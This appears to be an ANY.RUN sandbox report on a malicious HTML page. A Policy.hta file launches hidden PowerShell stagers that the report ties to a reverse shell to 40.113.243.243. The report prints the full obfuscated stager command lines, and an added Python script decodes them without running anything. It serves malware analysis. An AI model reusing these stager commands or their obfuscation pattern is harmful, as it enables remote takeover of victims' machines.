download: | index.html |
Full analysis: | https://app.any.run/tasks/0ee9093d-57d7-47cd-a4e7-d54ba2ae799a |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on the family, their capabilities range from full remote control of the victim's machine to stealing data and files and dropping other malware. The most common trojan infection chain starts with a phishing email. |
Analysis date: | August 12, 2022, 23:00:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, UTF-8 Unicode text, with very long lines |
MD5: | E24D1F9BF77B2A08253902E59D701E7E |
SHA1: | CBF379526A63C12340E22AE85614D98303BE6E77 |
SHA256: | 6CFC48E0A99357140203195DCEA702DDAA3D88DBF8F5321F174784A939D688F0 |
SSDEEP: | 768:BOcoF2YXCb2x/VI7uK1WbYTJlBnBfew7k6uLV5ppppppppppppppppppLlh6C:BOZF2EH/+fWbYT/Bhew7BmV5pppppppN |
TrID: | .html | HyperText Markup Language (100) |
Title: | - |
PID | Command line | Path | Parent process | User | Integrity | Exit code | Version
---|---|---|---|---|---|---|---
2984 | "C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\admin\Desktop\index.html" | C:\Program Files\Internet Explorer\iexplore.exe | Explorer.EXE | admin | MEDIUM | — | 11.00.9600.16428 (winblue_gdr.131013-1700)
3132 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2984 CREDAT:144385 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | admin | MEDIUM | — | 11.00.9600.16428 (winblue_gdr.131013-1700)
4036 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2984 CREDAT:333057 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | admin | LOW | — | 11.00.9600.16428 (winblue_gdr.131013-1700)
3596 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta" | C:\Windows\System32\mshta.exe | iexplore.exe | admin | MEDIUM | 0 | 11.00.9600.16428 (winblue_gdr.131013-1700)
2128 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwB7ADIAfQA0AHMASQBBAE8AWgBjADkAbQBJAEMAQQA3AFYAVwArADIAKwBxAFMAQgAnACcAKwAnACcAVAArAC8AUwBiADMAZgB5AEEAMwBKAGsAQgBpAFIAYQAzAGIAVgAzAEsAVABCAFIAOABWAEsANgAyAFcAZwBsAFcAdgAyAFUAeABoAGsAewAxAH0ARwBCAHMAVABEADQAdQBuAHYALwA5AHoAMABnADkATABHADMAMwBlADEAdQBjAGkAYwB4AHcAcwB4ADUAegBYAGUAKwBjAHcANQBlAEUAagBxAGMAcwBGACcAJwArACcAJwBEAFkATAA0AFQAdgBuAHoAOABKACsAUgBxAGcAQwBBAFcAQwBWAE0ATABuAHYAYgBKAFEASQBqAGUAbgAvAGsANQArAFAAaQAwADUALwBlAEEAKwBGAEwANABLADAAbABSAGQAcgBWAG8AcwBRAEMAUwBjAFgAVgB3ADAAawB5AGoAQwBJAFQAKwA4AFYAeQA0AHgAVgArAE0AWQBCAHcAKwBVADQARgBpAFMAaABUACsARgBrAFkAOABqAGYAewAyAH0AVAB6AHMATQBBAE8ARgA3ADQATABwAFQAOABxAGwANQBRADkASQBKACcAJwArACcAJwBxAEwANwBaAHIASQA4AGIARgB3AHAASQBaAHUAZQB0AFoAbgBEAGsAbwBqAHEANQBnAHIAUwByAGcAawBmAHYAcwBtAHkAdABPAGoAMgBxAHoAUwBmAGsAdwBRAGoAUwBYAFIAMwBNAFUAYwBCAHgAVwBYAFUAbABFAFcAZgBzAGkAcAB3ADcAdgBkAEMAawB1AGkAUQBaAHkASQB4AGMAegBqAGwAUgBFAEoAagArAHMAVgBLADQAeQBSAGgANgAvAEIAMgBoAG8AYgBtAFAAdgBNAGoAVQBXADQAegBmAHsAMQB9ADkASQBzAHkAVABLAE0AeQB2AGwAZABvADUAUwBFAGsAaQBQAEEANABpADUAcQBpAHUARwArAEUANABGAHMAJwAnACsAJwAnAHYAQwB7ADEAfQBQAFUAdwBuAGMAMQArAGwANgBhADUAKwA5AHMAawA1AEMAVABBAEYAVAAzAGsATwBHAEkAcgBFADAAZAByADQAdQBDADQAMABrAFcAaABTAC8ARQB0ACcAJwArACcAJwA5AG0AYQBnAFoAZgBLAEkAaABQAE8AWgBMAEkAUABZAG0AaQAyAHgAVgBBAG8AVABTAHMAdgBDAGYAegBFACcAJwArACcAJwBqAFgAZQB7ADEAfQB7ADEAfQBBAGQANQB7ADIAfQBsAGEAUwBYAFMAaQBBADEANABKAEYAYwBoAHIAUwArAGQAVgBHAEQAdQBRAG4ARgBCADEAWAB4AGoAVQBoAFQATABzAGkAdwBuAHYAZwBBAEUAUAA1AEkAVQBmAFEAJwAnACsAJwAnAEsAQwBxAEcAegAnACcAKwAnACcAMABmAEEAewAxAH0ARQBqADEAdgBGAEcAdQBhAG4AVwBBAEkAVwBoAHEAdwBtAEcAVABLAFgANABWAHEAVwBUAEQAQQBPACsASQBzADIAcwBGAHIANgBTADUASwBzAEQAeAA3AGcAaAB6AFMAUQA4AHMAZgB0AFYAVQByAEYARQBFAHQAdABtAEIAagBhAGoAUABpAHoAcAA3AFYAWAArAFcALwB0AEYAdQBpAGQAUwByADAAUABwAHQAYgAyAEMATQBoAGIAdQAxAEMARgBCAEMAbgBJAEsAegAwACcAJwArACcAJwBWAGsANgB3AFIAMwBHAEcAUgA2AFUAUQB1ADQAYgA0AEoARABFAC8AdwBHADQATABVAHoAeAB7ADIAfQBQAEEAVQA1AHAAYwBaAFAAYQB1ADIAQQA4AEMAZABkAEwAUwB7ADIAfQBVAHgAWgB7ADIAfQBxAFEARgA1AGoAaQBBAHAAUwBMAHIAOABPADUAcABBADMAUwBkAFIARABBAHcAYwBBADMAZQBFAGQAdQBGAHIAeQBvAEUAeAB3AEkAJwAnACsAJwAnAFoAMgBYAHgAcQA3AHcAbgByADYARABrAHsAMQAnACcAKwAnACcAfQBpAGsASwBJADcATAB3AGkAQwBCAE8AbgBYAEsAZwBvAGsAUgB4AFcANQBaAFUATQBPAFkANQBFAGQAcQB3AGwAbgAyAEsARAA2AHsAMgB9AGEAeQBTAFUARQB3AGYARgB2AEQAQQAzAGsALwA4AEcAWgArADYAMgB5AGMASwBZAFIANABrAEQAUwBRAFUASQA3AHMAdwBWAGQAZwBpAGkASwBTAEoAbABvAFUAdABjAHIATwAxAE0ATQBpAC8AYwBpADIALwBpADAAVQBTAFUAUQB2AFcAQQAnACcAKwAnACcAcABUAFgAawBBADMAWgBTAHsAMgB9AEUAeQBlAFUAaQBXAEMAUwBJAEUAVwBjAHMAWABFAFgAQQA5AFcARgBBAGMAZwBrAFgAVwB7ADEAfQBEAGsAVgB6ADYAQgBGADUAaABXAFQATQBRAG4AUABzAGkAdQArAEUAVwBkAFQAQgBnAGYAUQBwAEwAZwBVAGcATAA0AEsARQBaAEoAdQBVADgAYgBKAGcAawA0AGgARABEADAAbwB4AGoAcQAzAC8ARQBjAHsAMgB9AFAAbgBTAGMATABwAFIAbgBoAFAARABGAFMAVQBWAHQAVABiAGMAZABUADgAcABmAHcASgB7ADIAfQA2ADgAUwB5AG0AYQA0ADUATwBoAEUAWABGAEEAbwBoAE8AeABRAEUATQB4AFAAbQBrAGMAdQBvACcAJwArACcAJwB6ADAAUgBiAGsAaABUAFIAWABXAFcAQQArAHAANABXAGgATABVAGwATQAzAHAASwBZAGIAOABMAFAASQBzAGMANQBhAHAAKwA1AFYAYgA5AEYAVgBvAHQAYgBXADkAMQBRADkAMQBvADMAdQBvAEQAWABzAGQAaAB2AHIAbgBtAGsAMwB1AHsAMQB9AG4AVwArAGQAVgBBADUAMABiADcAZgByAEUAdwAxAGUANgB0AHsAMQB9AGUAWQBUAFgAZQAzAGUAawBlAHAAeQAzAHsAMQB9AGkAdgBlAG0AUgB2ADkAbABWADMAdgBGAFYATwA5AHQAcAArAFUAOQBXADIAKwA4AFgAYwA5AGMAWQB0AHoANQB1AGYAZQB1AFoAdAA3AGIAYwBPADYAWQArAGEAUQA2ADEAYQBSAC8AMQBXAE8AKwBtAFAAdABJADEAVwBiAGMAUgB0AHMAdQBrAE8AaQBUAFYAYwA5AGoAcgA4AFkAVwB4AFQAWgB7ADIAfQBuAEsALwBMADUAMgBqAHMAaQAyAHsAMgB9AHkAMwBzAEcAagBQADIAdQBxAHAAZQArAHMAZgBPAHYAdQBmAFoAbAA3ADcAaAA3AHMAWgBkADUAWAB6AFUAVwBLAHAAdABWAFcAMgBHAGIAYgB1AGoAcwBhAHUAeABGAHEAawBEAHgAYgBZADYAMgB0AEIAcQBhADgATQBoADcASgAzAE0ARgBhADgAQgBlADcAVABPAE8AcQBqAHAAYgA4ACsAVQBhADYAYgBPAFYAZABYAFMAdwB3AEQANQAyAHMAaQB1AGsAOABuAHEALwB0AFkAewAyAH0AVwB4ADAASQB3AFYAQwBxAEQAZAAzAEYAVwAzAGIAVwB7ADIAfQB4AEYANwByAGQAagBvACcAJwArACcAJwA4AHAAcABQADEARwBhAHYAVQBYAFAAdgA3AFgAMgAzAGoAdgB6AGUAeABFADcANgA1ADUAUABZAGIAZgBkAGEARwAwADAAZAAxADkAbwA5AHIAWABXAHAAdABtADgAdABxAHoATQBaADIAYwB2AEoANgBJADUATwBSAGwAWgB0AHcAcgBDAHoAVQBYAHkAdwBRAGIAQgAyAFkAeQA4AGYARgBPAHsAMQB9AHkAcgB2AHYAYgAyAGgAeAA4AG4AVwBiADIAQQB4AEwAUQBoADcAcQByAG4ARgB0AG4AVwByAGkANQBtAGcALwBXAGMAMwBjADQATwByADMAZABYAHUAOABlADYAawB5ADEARgBNAFgAKwBBAHQAbQBlAFcAaQBUAGsAeAAvAFYAWgBhAGEAdQBsAHIAZgBEAHoAcAA5AEkAaQBlAHAAewAyAH0AdQA5AHoAcQA5AGcAYQBMAFkAUgB4AFIAbwBBAEIAMgA4ACcAJwArACcAJwBxAE0AVQBPACcAJwArACcAJwBpAHoAcAA1AFQAeAAnACcAKwAnACcANAB3AGsAbQBwAEkARQBvAHoAMwBKAFkANQBDAFQARwBFAGUAdwBzAFEAcwBLAEsAeABTAHkAcAB4ADAASgBHAFMAOQBHADgAYgBSAFkAVQBpAGsATQB3AHYAUQBTAHcAewAxAH0ANgA2ADAAawBXAG4AZwBUAGwANQAwAGwAUgBiAEYAMQBjAFQAQwAnACcAKwAnACcAQgBHAEsASQB1AE0AcwA1AFUAKwBEAHUAZgBjAEwAMQBlADMAeAA5AFUAcQB0AFAAagBxAHQAdAByAEkAUwB1AEQAagBWACcAJwArACcAJwAyAHUAeQAxAFUANAA2AFcAQwB1AG4AVQB3AEsAZwBlAGIASgBPAE0AKwB0AGcAawB7ADIAfQBpAEMASgBQADEAcQB1AE8AQgBqAGcARQB7ADEAfQBYAGUAaAArAHcAOQA3AEEARAB6ADAAdABvAEkAOQBEAFYARAB1AFcAZABJAHEAZwB4AFIAbAAvAGkAbAAxADMAcgBpAFEAZQB2AHcAQQBQAFUAYQBuAEQAeABhAGYAbwBkAEEAQQB3AEIAOQBTAFAAOABLAEoAUgA0AE8AaQBGAGYAVAB0AHoAUwA0ADgAbgBKAHkAYQArAGsAVABkADYAaQBmAFAAaAB6AC8ANAAwADIAegAzAHYALwBjAFAAbwBoAEsAbABYAEwASwBUAFkALwBiAGIANwBlAGUAewAxAH0AewAyAH0AWgBmADkAbgAxAFIANABoAHcAawBEAE8AaAB6AFYASgA4AG0AUAB0AHYAbwA1AEQAWAB5AFkAdgBrAHAAcABtAEIASQB2AEQAeQBsAFgANABQADMAeQBUADgANgBCAHEAKwByAHIASgBlAC8AeABlADQAaAB6AEUAYQBpAFEAcwBBAEEAQQB7ADAAfQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAE4AJwAnACwAJwAnAEgAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | admin | MEDIUM | 0 | 10.0.14409.1005 (rs1_srvoob.161208-1155)
888 | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('{2}4sIAOZc9mICA7VW+2+qSB'+'T+/Sb3fyA3JkBiRa3bV3KTBR8VK62WglWv2Uxhk{1}GBsTD4unv/9z0g9LG33e1ucicxwsx5zXe+cw5eEjqcsF'+'DYL4Tvnz8J+RqgCAWCVMLnvbJQIjen/k5+Pi05/eA+FL4K0lRdrVosQCScXVw0kyjCIT+8Vy4xV+MYBw+U4FiShT+FkY8jf{2}TzsMAOF74LpT8ql5Q9IJ'+'qL7ZrI8bFwpIZuetZnDkojq5grSrgkfvsmytOj2qzSfkwQjSXR3MUcBxWXUlEWfsipw7vdCkuiQZyIxczjlREJj+sVK4yRh6/B2hobmPvMjUW4zf{1}9IsyTKMyvldo5SEkiPA4i5qiuG+E4Fs'+'vC{1}PUwnc1+l6a5+9sk5CTAFT3kOGIrE0dr4uC40kWhS/Et'+'9magZfKIhPOZLIPYmi2xVAoTSsvCfzE'+'jXe{1}{1}Ad5{2}laSXSiA14JFchrS+dVGDuQnFB1XxjUhTLsiwnvgAEP5IUfQ'+'KCqGz'+'0fA{1}Ej1vFGuanWAIWhqwmGTKX4VqWTDAO+Is2sFr6S5KsDx7ghzSQ8sftVUrFEEttmBjajPizp7VX+W/tFuidSr0Pptb2CMhbu1CFBCnIKz0'+'Vk6wR3GGR6UQu4b4JDE/wG4LUzx{2}PAU5pcZPau2A8CddLS{2}UxZ{2}qQF5jiApSLr8O5pA3SdRDAwcA3eEduFryoExwI'+'Z2Xxq7wnr6Dk{1'+'}ikKI7LwiCBOnXKgokRxW5ZUMOY5Edqwln2KD6{2}aySUEwfFvDA3k/8GZ+62ycKYR4kDSQUI7swVdgiiKSJloUtcrO1MMi/ci2/i0USUQvWA'+'pTXkA3ZS{2}EyeUiWCSIEWcsXEXA9WFAcgkXW{1}DkVz6BF5hWTMQnPsiu+EWdTBgfQpLgUgL4KEZJuU8bJgk4hDD0oxjq3/Ec{2}PnScLpRnhPDFSUVtTbcdT8pfwJ{2}68Syma45OhEXFAohOxQEMxPmkcuo'+'z0RbkhTRXWWA+p4WhLUlM3pKYb8LPIsc5ap+5Vb9FVotbW91Q91o3uoDXsdhvrnmk3u{1}nW+dVA50b7frEw1e6t{1}eYTXe3ekepy3{1}ivemRv9lV3vFVO9tp+U9W2+8Xc9cYtz5ufeuZt7bcO6Y+aQ61aR/1WO+mPtI1WbcRtsukOiTVc9jr8YWxTZ{2}nK/L52jsi2{2}y3sGjP2uqpe+sfOvufZl77h7sZd5XzUWKptVW2GbbujsauxFqkDxbY62tBqa8Mh7J3MFa8Be7TOOqjpb8+Ua6bOVdXSwwD52siuk8nq/tY{2}Wx0IwVCqDd3FW3bW{2}xF7rdjo'+'8ppP1GavUXPv7X23jvzexE7655PYbfdaG00d19o9rXWptm8tqzMZ2cvJ6I5ORlZtwrCzUXywQbB2Yy8fFO{1}yrvvb2hx8nWb2AxLQh7qrnFtnWri5mg/Wc3c4Or3dXu8e6ky1FMX+AtmeWiTkx/VZaaulrfDzp9Iiep{2}u9zq9gaLYRxRoAB28'+'qMUO'+'izp5Tx'+'4wkmpIEoz3JY5CTGEewsQsKKxSypx0JGS9G8bRYUikMwvQSw{1}660kWngTl50lRbF1cTC'+'BGKIuMs5U+DufcL1e3x9UqtPjqttrISuDjV'+'2uy1U46WCunUwKgebJOM+tgk{2}iCJP1quOBjgE{1}Xeh+w97ADz0toI9DVDuWdIqgxRl/il13riQevwAPUanDxafodAAwB9SP8KJR4OiFfTtzS48nJya+kTd6ifPhz/402z3v/cPohKlXLKTY/bb7ee{1}{2}Zf9n1R4hwkDOhzVJ8mPtvo5DXyYvkppmBIvDylX4P3yT86Bq+rrJe/xe4hzEaiQsAAA{0}{0}')-f'=','N','H')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | admin | MEDIUM | 0 | 10.0.14409.1005 (rs1_srvoob.161208-1155)
3072 | cmd | C:\Windows\system32\cmd.exe | powershell.exe | admin | MEDIUM | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3284 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy.hta" | C:\Windows\System32\mshta.exe | iexplore.exe | admin | MEDIUM | 0 | 11.00.9600.16428 (winblue_gdr.131013-1700)
2548 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | admin | MEDIUM | 0 | 10.0.14409.1005 (rs1_srvoob.161208-1155)
3196 | "powershell.exe" -nop -w hidden -c &([scriptblock]::create(... (command line identical to PID 888 above: the same -f / gzip / base64 wrapper, launched by the second mshta.exe instance) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | admin | MEDIUM | — | 10.0.14409.1005 (rs1_srvoob.161208-1155)
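The process tree above records the whole chain: iexplore.exe opens index.html, which pulls Policy.hta into the IE cache; mshta.exe runs the cached .hta and starts powershell.exe -nop -w hidden -e with a base64 blob that is UTF-16LE script (PID 2128). That script checks [IntPtr]::Size to pick the 32-bit PowerShell under syswow64 and starts a second powershell.exe (PID 888) through ProcessStartInfo; the second command line gunzips a base64 string that was first obfuscated by swapping '=', 'N' and 'H' for {0}, {1} and {2} and chopping it into 'a'+'b' fragments, so the -f format operator only reassembles the real base64 at run time. The result spawns cmd.exe (PID 3072), which the alerts below tie to the 40.113.243.243:80 connection as a reverse shell. This launcher shape (IntPtr size check, ProcessStartInfo, GzipStream fed to [scriptblock]::create) is characteristic of Metasploit-style PowerShell stagers; the page itself does not attribute it. The Python below is an added example for this page, not sandbox output and not the malware's own code: it reverses both wrapper layers without executing anything. STAGE1_PREFIX is the first 120 characters of PID 2128's real -e argument; everything fed to the gzip stage is a constructed sample, because the decompressed final payload is not reproduced on this page.

```python
"""Decode the two PowerShell launcher stages recorded in the process tree.

Stage 1 (PID 2128): powershell.exe -nop -w hidden -e <base64 of UTF-16LE script>
Stage 2 (PID 888):  powershell.exe -nop -w hidden -c &([scriptblock]::create(
    ... FromBase64String((('{2}4sI...'+'...{0}{0}')-f'=','N','H') ...
    [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    i.e. gzip(script) -> base64 -> '=', 'N', 'H' replaced by {0}, {1}, {2} -> chopped
    into 'a'+'b' fragments; PowerShell's -f operator puts the letters back at run time.
"""
import base64
import gzip
import re

# First 120 characters of the real -e argument of PID 2128 (copied from the table above).
STAGE1_PREFIX = ("aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkA"
                 "ewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0A")

# ('frag'+'frag')-f'x','y','z'  -- tolerant of whitespace. The ''-doubled quotes that
# appear when stage 2 is nested inside stage 1's single-quoted $s.Arguments are undone first.
FORMAT_EXPR = re.compile(r"\(\s*('.*?')\s*\)\s*-f\s*((?:'[^']*'\s*,?\s*)+)", re.S)
QUOTED = re.compile(r"'([^']*)'")


def decode_encoded_command(b64: str) -> str:
    """Reverse powershell -EncodedCommand / -e: base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_stage2(cmdline: str) -> str:
    """Recover the script behind the -f / base64 / gzip wrapper without running it."""
    text = cmdline.replace("''", "'")
    m = FORMAT_EXPR.search(text)
    if m is None:
        raise ValueError("no ('...'+'...')-f'...' expression in command line")
    # Join the '+' fragments BEFORE substituting: a cut may fall inside a
    # placeholder, as in the page's "{1'+'}".
    template = "".join(QUOTED.findall(m.group(1)))
    args = QUOTED.findall(m.group(2))
    b64 = re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], template)
    return gzip.decompress(base64.b64decode(b64)).decode("utf-8")


def decode_chain(encoded_command: str) -> str:
    """Stage 1 -e blob -> stage 1 script -> embedded stage 2 -> final script."""
    return decode_stage2(decode_encoded_command(encoded_command))


# ---- CONSTRUCTED test input: a placeholder script, NOT the real payload --------------
SAMPLE_SCRIPT = "Write-Host 'constructed stage-3 placeholder, not the real payload'"


def build_sample_chain(script: str) -> str:
    """Wrap `script` the way the page's two stages do, so the decoders can be
    checked against a known answer. Returns the stage-1 -e argument."""
    b64 = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    tpl = b64.replace("=", "{0}").replace("N", "{1}").replace("H", "{2}")
    # gzip base64 always starts "H4sI", so tpl starts "{2}4sI"; cut inside that placeholder.
    frags = [tpl[:2], tpl[2:40], tpl[40:]]
    expr = "(" + "+".join("'%s'" % f for f in frags) + ")-f'=','N','H'"
    stage2 = ("-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader("
              "New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream("
              ",[System.Convert]::FromBase64String((" + expr + ")))),"
              "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))")
    stage1 = ("if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+"
              "'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};"
              "$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;"
              "$s.Arguments='" + stage2.replace("'", "''") + "';"
              "$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;"
              "$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;"
              "$p=[System.Diagnostics.Process]::Start($s);")
    return base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    print(decode_encoded_command(STAGE1_PREFIX))   # the start of PID 2128's script
    print(decode_chain(build_sample_chain(SAMPLE_SCRIPT)))
```

To use it on the report, paste the full -e argument of PID 2128 into decode_chain(); decode_encoded_command() alone shows the stage-1 script, and decode_stage2() accepts the command line of PID 888 directly. Nothing is executed: the only operations are base64, gzip and string substitution, which is the point of doing this in Python instead of letting PowerShell evaluate the -f expression.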
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPDaysSinceLastAutoMigration |
Value: 1 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPLastLaunchLowDateTime |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPLastLaunchHighDateTime |
Value: 30977695 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
Operation: | write | Name: | NextCheckForUpdateLowDateTime |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 30977695 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy[1].hta | html | B4FC4742EBCC8E216DB3B1C019E6D7BE | 64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy[1].hta | html | B4FC4742EBCC8E216DB3B1C019E6D7BE | 64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2
2984 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy.hta | html | B4FC4742EBCC8E216DB3B1C019E6D7BE | 64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | binary | A7F36789ABEC447802483DAEF868E5C6 | E46EA58251ED922164AE33876B7CADCCF32F47FA29BF9BE32B9DA152D92E2750
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta.j1blg0i.partial | html | B4FC4742EBCC8E216DB3B1C019E6D7BE | 64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2
2984 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta | html | B4FC4742EBCC8E216DB3B1C019E6D7BE | 64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | FCFA516D48CBE832E5FA7BA81CE121A4 | 51155C6C29FF19CE4742E2083575D1F8AB06D868C59872B643D81769C8DDBA1D
